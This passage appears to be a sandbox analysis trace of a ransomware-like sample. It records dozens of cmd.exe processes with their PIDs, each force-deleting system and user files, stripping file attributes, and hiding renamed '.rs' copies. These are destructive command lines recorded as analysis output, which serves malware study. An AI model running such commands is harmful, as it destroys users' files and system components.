C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\comdll.X.manifest""
3⤵
PID:11700

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Default\NTUSER.DAT.LOG1""
3⤵
PID:11760

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Users\Default\NTUSER.DAT.LOG1""
3⤵
PID:11284

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\Users\Default\NTUSER.DAT.LOG1"
4⤵
PID:8688

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\Music\CompleteUnblock.reg""
3⤵
PID:16932

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler.exe""
3⤵
PID:16924

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\folder.ico""
3⤵
PID:8684

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\folder.ico""
3⤵
PID:16864

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_32\MSBuild\3.5.0.0__b03f5f7f11d50a3a\msbuild.exe.config""
3⤵
PID:6528

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_64\CustomMarshalers\e251e07a65ea3f2a157796a054971e60\CustomMarshalers.ni.dll.aux""
3⤵
PID:11120

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\__AssemblyInfo__.ini""
3⤵
PID:5776

C:\Windows\system32\attrib.exe
attrib +h "C:\Program Files\Common Files\microsoft shared\ink\bg-BG\tipresx.dll.mui"
4⤵
PID:22116

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft_Windows-10-Pro.swidtag""
3⤵
PID:14552

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\Users\All Users\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft Office 16 Click-to-Run Extensibility Component.swidtag""
3⤵
PID:7872

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\Microsoft.Build.Conversion.v3.5.dll""
3⤵
PID:16648

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h "C:\Users\Admin\NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000001.regtrans-ms""
3⤵
PID:2500

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h "C:\Program Files\desktop.ini""
3⤵
PID:12432

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.G46fcc235#\de5746e37bc1d0b03494d33880d0afbc\Microsoft.GroupPolicy.Interop.ni.dll""
3⤵
PID:18384

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\Users\Admin\NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TM.blf""
3⤵
PID:18352

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\Cursors\aero_arrow.cur""
3⤵
PID:18344

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mff1be75b#\37d6fd5d41dbee3784e71805d0eee043\Microsoft.ManagementConsole.ni.dll""
3⤵
PID:18332

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_MSIL\Microsoft.Build.Utilities\2.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Utilities.dll""
3⤵
PID:18296

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\debug\ESE.TXT""
3⤵
PID:18112

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TM.blf.rs""
3⤵
PID:18104

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v2.0.50727_32\indexc.dat""
3⤵
PID:9944

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files\desktop.ini""
3⤵
PID:7532

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000001.regtrans-ms""
3⤵
PID:2912

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\System\ado\adovbs.inc""
3⤵
PID:6788

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ga41585c2#\aebb842f1a2cde4051548051d4a16b47\Microsoft.GroupPolicy.AdmTmplEditor.ni.dll.aux""
3⤵
PID:12400

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Windows\assembly\NativeImages_v2.0.50727_32\indexc.dat""
3⤵
PID:8104

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\bopomofo.nlp""
3⤵
PID:12756

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft-Wfa2436cc#\6f3cde160ba5e97255cd8b9c5b9b96ac\Microsoft-Windows-HomeGroupDiagnostic.Interop.ni.dll.aux""
3⤵
PID:17188

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\01a - Windows PowerShell.lnk""
3⤵
PID:17236

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Program Files (x86)\Common Files\System\ado\adovbs.inc""
3⤵
PID:17260

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt""
3⤵
PID:17120

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\Users\Admin\NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000001.regtrans-ms.rs""
3⤵
PID:16804

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\Program Files\desktop.ini.rs""
3⤵
PID:11724

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft_Windows-10-Pro.swidtag""
3⤵
PID:17664

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_32\PresentationCore\3.0.0.0__31bf3856ad364e35\PresentationFontCache.exe.config""
3⤵
PID:17656

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\AppCenter_R.aapp""
3⤵
PID:17552

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\appcompat\Programs\Amcache.hve.LOG2""
3⤵
PID:17540

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\Windows\appcompat\Programs\Amcache.hve.LOG2.rs""
3⤵
PID:17524

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\Microsoft Shared\Ink\en-US\micaut.dll.mui""
3⤵
PID:17464

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe""
3⤵
PID:17472

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h "C:\Windows\appcompat\Programs\Amcache.hve.LOG2""
3⤵
PID:17480

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\container.dat""
3⤵
PID:17488

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_64\System.EnterpriseServices\2.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll""
3⤵
PID:17456

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\container.dat.rs""
3⤵
PID:17420

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\Microsoft Shared\Stationery\Bears.jpg""
3⤵
PID:12732

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\Windows\appcompat\Programs\Amcache.hve.LOG1""
3⤵
PID:12540

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\MF\Pending.GRL""
3⤵
PID:7172

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml""
3⤵
PID:4628

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png""
3⤵
PID:10112

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\msinfo32.exe.mui""
3⤵
PID:9520

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\System\en-US\wab32res.dll.mui""
3⤵
PID:9280

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Program Files (x86)\Common Files\System\en-US\wab32res.dll.mui""
3⤵
PID:9276

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\Documents\desktop.ini""
3⤵
PID:11380

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\tqq24hzz.default-release\OfflineCache\index.sqlite""
3⤵
PID:1560

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\Users\Admin\Documents\desktop.ini.rs""
3⤵
PID:10324

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h "C:\Users\Admin\Documents\desktop.ini""
3⤵
PID:8056

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Storage Health\StorageHealthModel.dat""
3⤵
PID:12172

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\tqq24hzz.default-release\cache2\ce_T151c2VyQ29udGV4dElkPTUs""
3⤵
PID:5608

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\Roaming\CompressShow.ico""
3⤵
PID:11912

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Public\AccountPictures\desktop.ini""
3⤵
PID:2264

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\UEV\InboxTemplates\DesktopSettings2013.xml""
3⤵
PID:9328

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\ProgramData\Microsoft\UEV\InboxTemplates\DesktopSettings2013.xml""
3⤵
PID:8516

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Public\Desktop\desktop.ini""
3⤵
PID:7220

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157""
3⤵
PID:14480

C:\Windows\system32\attrib.exe
attrib -h "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\EmieSiteList\container.dat"
4⤵
PID:4228

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157""
3⤵
PID:11820

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_64\PresentationCore\3.0.0.0__31bf3856ad364e35\PresentationFontCache.exe.config""
3⤵
PID:7156

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Provisioning\{23cb517f-5073-4e96-a202-7fe6122a2271}\MasterDatastore.xml""
3⤵
PID:11400

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Dummy.aff""
3⤵
PID:11764

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files\Common Files\microsoft shared\OFFICE16\Office Setup Controller\pidgenx.dll""
3⤵
PID:17200

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\02 - Command Prompt.lnk""
3⤵
PID:14844

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\Microsoft Shared\Ink\en-US\mshwLatin.dll.mui""
3⤵
PID:5512

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\print_pref.ico""
3⤵
PID:7996

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files\Common Files\microsoft shared\ink\ar-SA\tipresx.dll.mui""
3⤵
PID:6036

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Internet Explorer\hmmapi.dll""
3⤵
PID:8656

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\System\ado\msader15.dll""
3⤵
PID:11288

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\Local\Comms\UnistoreDB\USS.jtx""
3⤵
PID:5964

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\System\ado\en-US\msader15.dll.mui""
3⤵
PID:15356

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files\Common Files\microsoft shared\VC\msdia90.dll""
3⤵
PID:19072

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\ProgramData\Microsoft\ClickToRun\ProductReleases\7F90D34A-6846-4B37-9E6C-DA49ECC4DACB\en-us.16\MasterDescriptor.en-us.xml""
3⤵
PID:14296

C:\Windows\system32\attrib.exe
attrib +h "C:\ProgramData\Microsoft\ClickToRun\ProductReleases\7F90D34A-6846-4B37-9E6C-DA49ECC4DACB\en-us.16\MasterDescriptor.en-us.xml"
4⤵
PID:12864

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\AddInSideAdapters\Microsoft.VisualStudio.Tools.Office.Word.AddInAdapter.v9.0.dll""
3⤵
PID:12684

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Provisioning\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\customizations.xml""
3⤵
PID:6580

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Provisioning\{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}\customizations.xml""
3⤵
PID:13264

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\pubpol23.dat.rs""
3⤵
PID:13896

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\Music\ConvertDebug.ADTS""
3⤵
PID:6712

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\Microsoft.Build.Engine.dll""
3⤵
PID:11948

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Boot\bg-BG\bootmgr.exe.mui""
3⤵
PID:7588

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files\Common Files\microsoft shared\Stationery\Bears.jpg""
3⤵
PID:8228

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\Settings\settings.dat""
3⤵
PID:8560

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Boot\en-GB\bootmgr.exe.mui""
3⤵
PID:12860

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Boot\en-GB\bootmgr.exe.mui""
3⤵
PID:5608

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini""
3⤵
PID:12120

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_64\PresentationCore\3.0.0.0__31bf3856ad364e35\wpfgfx_v0300.dll""
3⤵
PID:17792

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Windows Defender\Network Inspection System\Support\NisLog.txt""
3⤵
PID:5260

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v2.0.50727_32\srmlib\d67bc466d450d5f59be9e89e3e4abe28\srmlib.ni.dll""
3⤵
PID:10288

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0000E781\02_Music_added_in_the_last_month.wpl""
3⤵
PID:14656

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\Program Files\Common Files\microsoft shared\Stationery\Bears.htm""
3⤵
PID:18496

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT""
3⤵
PID:18448

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Provisioning\{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}\Prov\RunTime\0__Power_Policy.provxml""
3⤵
PID:10272

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Public\Documents\desktop.ini""
3⤵
PID:11592

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\System\ado\msader15.dll""
3⤵
PID:14900

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Boot\de-DE\bootmgr.exe.mui""
3⤵
PID:16364

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\System\ado\en-US\msader15.dll.mui""
3⤵
PID:13792

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Public\Libraries\desktop.ini""
3⤵
PID:6612

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\Users\Public\Documents\desktop.ini.rs""
3⤵
PID:13120

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\Users\Public\Libraries\desktop.ini.rs""
3⤵
PID:15652

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Boot\el-GR\bootmgr.exe.mui""
3⤵
PID:12928

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\ProgramData\Microsoft\Provisioning\{23cb517f-5073-4e96-a202-7fe6122a2271}\customizations.xml""
3⤵
PID:16776

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files\Common Files\microsoft shared\VGX\VGX.dll""
3⤵
PID:14316

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Windows NT\MSScan\WelcomeScan.jpg""
3⤵
PID:6944

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini""
3⤵
PID:11052

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files\Common Files\microsoft shared\ink\bg-BG\tipresx.dll.mui""
3⤵
PID:14132

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files\Common Files\microsoft shared\ink\ar-SA\tipresx.dll.mui""
3⤵
PID:13848

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Provisioning\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\customizations.xml""
3⤵
PID:11892

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Provisioning\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\Prov\RunTime\0__Power_Policy.provxml""
3⤵
PID:13856

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h "C:\Users\Admin\NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000002.regtrans-ms""
3⤵
PID:13056

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\Settings\settings.dat""
3⤵
PID:8504

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h "C:\Users\Public\Music\desktop.ini""
3⤵
PID:14912

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\Program Files\Common Files\System\ado\en-US\msader15.dll.mui"
4⤵
PID:3344

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\5 - Task Manager.lnk""
3⤵
PID:14112

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Provisioning\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\Prov\RunTime.xml""
3⤵
PID:17152

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Users\All Users\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1""
3⤵
PID:10980

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\Users\All Users\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1"
4⤵
PID:17376

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S54faafb0#\721dea448562f6bf7161fdc132358e2a\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.ni.dll""
3⤵
PID:17836

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\Local\Packages\EnvironmentsApp_cw5n1h2txyewy\Settings\roaming.lock""
3⤵
PID:10000

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Windows Defender\Definition Updates\Default\GapaEngine.dll""
3⤵
PID:12948

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Provisioning\{ee4aac98-c174-4941-82b1-d121e493e4fb}\customizations.xml""
3⤵
PID:11708

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-black_scale-100.png""
3⤵
PID:7108

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\On-Screen Keyboard.lnk""
3⤵
PID:6912

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Windows\DeviceMetadataCache\dmrc.idx""
3⤵
PID:8680

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S1bc92e04#\dd6efc69d706616043df44ee6d16e3ad\Microsoft.SecureBoot.Commands.ni.dll""
3⤵
PID:11600

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Provisioning\{23cb517f-5073-4e96-a202-7fe6122a2271}\Prov\RunTime.xml""
3⤵
PID:15944

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files\Common Files\microsoft shared\VSTO\10.0\1033\VSTOLoaderUI.dll""
3⤵
PID:2072

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt""
3⤵
PID:2300

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_MSIL\Microsoft.Office.Interop.Graph\15.0.0.0__71e9bce111e9429c\Microsoft.Office.Interop.Graph.dll""
3⤵
PID:10440

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT""
3⤵
PID:7700

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P9de5a786#\48ffa648732cc4b9129dd42510e885e6\Microsoft.PowerShell.Management.Activities.ni.dll.aux""
3⤵
PID:4552

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\Documents\EditResume.wps""
3⤵
PID:16772

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\ProgramData\Microsoft\Provisioning\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\customizations.xml""
3⤵
PID:18852

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442""
3⤵
PID:13192

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\Users\All Users\Microsoft\ClickToRun\ProductReleases\7F90D34A-6846-4B37-9E6C-DA49ECC4DACB\x-none.16\s640.hash"
4⤵
- Views/modifies file attributes
PID:22424

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\print_property.ico""
3⤵
PID:14508

C:\Windows\system32\attrib.exe
attrib +h "C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442"
4⤵
PID:22384

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Program Files\Common Files\microsoft shared\ink\ar-SA\tipresx.dll.mui""
3⤵
PID:8524

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\Windows\debug\ESE.TXT""
